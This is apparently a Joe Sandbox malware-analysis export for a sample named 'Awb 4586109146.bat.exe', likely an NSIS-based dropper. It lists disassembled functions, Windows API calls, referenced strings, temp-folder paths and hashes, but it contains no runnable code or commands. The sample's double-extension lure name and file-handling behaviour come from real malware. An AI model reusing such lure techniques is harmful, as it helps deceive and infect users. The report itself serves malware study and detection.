Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68

Function 73961B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 7396121B: GlobalAlloc.KERNELBASE(00000040,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73961C6B
lstrcpyW.KERNEL32(00000008,?), ref: 73961CB3
lstrcpyW.KERNEL32(00000808,?), ref: 73961CBD
GlobalFree.KERNEL32(00000000), ref: 73961CD0
GlobalFree.KERNEL32(?), ref: 73961DB2
GlobalFree.KERNEL32(?), ref: 73961DB7
GlobalFree.KERNEL32(?), ref: 73961DBC
GlobalFree.KERNEL32(00000000), ref: 73961FA6
lstrcpyW.KERNEL32(?,?), ref: 73962140
GetModuleHandleW.KERNEL32(00000008), ref: 739621B5
LoadLibraryW.KERNEL32(00000008), ref: 739621C6
GetProcAddress.KERNEL32(?,?), ref: 73962220
lstrlenW.KERNEL32(00000808), ref: 7396223A

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: ce41b6c76a292eee586bf9fe128fd2ef06c781ef0940fc6ca32bba30b8eecf69
Instruction ID: e6183d6f3ad124b3bd6de3a66bc6e0db4a5397b05aa084dd3109ea2f73567965
Opcode Fuzzy Hash: ce41b6c76a292eee586bf9fe128fd2ef06c781ef0940fc6ca32bba30b8eecf69
Instruction Fuzzy Hash: 4122B972C0660ADFDB16CFA4C9807EEB7B9FB04385F10452ED1A6E7284D7749A808B53

Function 004059CC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059F5
lstrcatW.KERNEL32(brainpower\indbefattende.Cob,\*.*,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A3D
lstrcatW.KERNEL32(?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A60
lstrlenW.KERNEL32(?,?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A66
FindFirstFileW.KERNELBASE(brainpower\indbefattende.Cob,?,?,?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A76
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
FindClose.KERNEL32(00000000), ref: 00405B25

Strings

brainpower\indbefattende.Cob, xrefs: 00405A25, 00405A2B, 00405A3C, 00405A75
"C:\Users\user\Desktop\Awb 4586109146.bat.exe", xrefs: 004059CC
C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
\*.*, xrefs: 00405A37

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$brainpower\indbefattende.Cob
API String ID: 2035342205-3455809026
Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E

Function 004065FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00406608
FindClose.KERNEL32(00000000), ref: 00406614

Strings

C:\, xrefs: 004065FD

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\sillinesses, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\sillinesses
API String ID: 542301482-3064817632
Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29

Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
ShowWindow.USER32(?), ref: 00403DB1
DestroyWindow.USER32 ref: 00403DC5
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
GetDlgItem.USER32(?,?), ref: 00403E02
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
IsWindowEnabled.USER32(00000000), ref: 00403E1D
GetDlgItem.USER32(?,?), ref: 00403ECB
GetDlgItem.USER32(?,00000002), ref: 00403ED5
SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F40
GetDlgItem.USER32(?,00000003), ref: 00403FE6
ShowWindow.USER32(00000000,?), ref: 00404007
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
EnableWindow.USER32(?,?), ref: 00404034
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040404A
EnableMenuItem.USER32(00000000), ref: 00404051
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404069
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
SetWindowTextW.USER32(?,0042D248), ref: 004040BA
ShowWindow.USER32(?,0000000A), ref: 004041EE

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

Function 004039AA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000), ref: 00403A2B
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\sillinesses,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\sillinesses,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\sillinesses), ref: 00403B12

Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E

RegisterClassW.USER32(00433E80), ref: 00403B4F
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
ShowWindow.USER32(00000005,00000000), ref: 00403BD2
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
RegisterClassW.USER32(00433E80), ref: 00403C14
DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004039B6
.DEFAULT\Control Panel\International, xrefs: 00403A16
RichEd32, xrefs: 00403BE6
Call, xrefs: 00403A72, 00403A7B, 00403A89, 00403AD8, 00403ADE
1033, xrefs: 004039CA, 00403A26
.exe, xrefs: 00403AB8
C:\Users\user\AppData\Local\sillinesses, xrefs: 00403A3A, 00403A42, 00403AE5, 00403AEB, 00403AFB
RichEdit, xrefs: 00403C05
_Nb, xrefs: 00403B2E, 00403B96
Control Panel\Desktop\ResourceLocale, xrefs: 004039DE
"C:\Users\user\Desktop\Awb 4586109146.bat.exe", xrefs: 004039AE
RichEd20, xrefs: 00403BD8
RichEdit20W, xrefs: 00403BF6, 00403BFC

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sillinesses$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3787320207
Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Awb 4586109146.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb 4586109146.bat.exe,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

Error launching installer, xrefs: 00402F2D
"C:\Users\user\Desktop\Awb 4586109146.bat.exe", xrefs: 00402EDD
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
soft, xrefs: 00402FCB
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
C:\Users\user\Desktop\Awb 4586109146.bat.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
Inst, xrefs: 00402FC2
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
Null, xrefs: 00402FD4

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb 4586109146.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3877308773
Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

Function 004062DC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000), ref: 00406430
SHGetSpecialFolderLocation.SHELL32(00405359,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000), ref: 0040646C
SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 0040647A
CoTaskMemFree.OLE32(0041C000), ref: 00406485
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
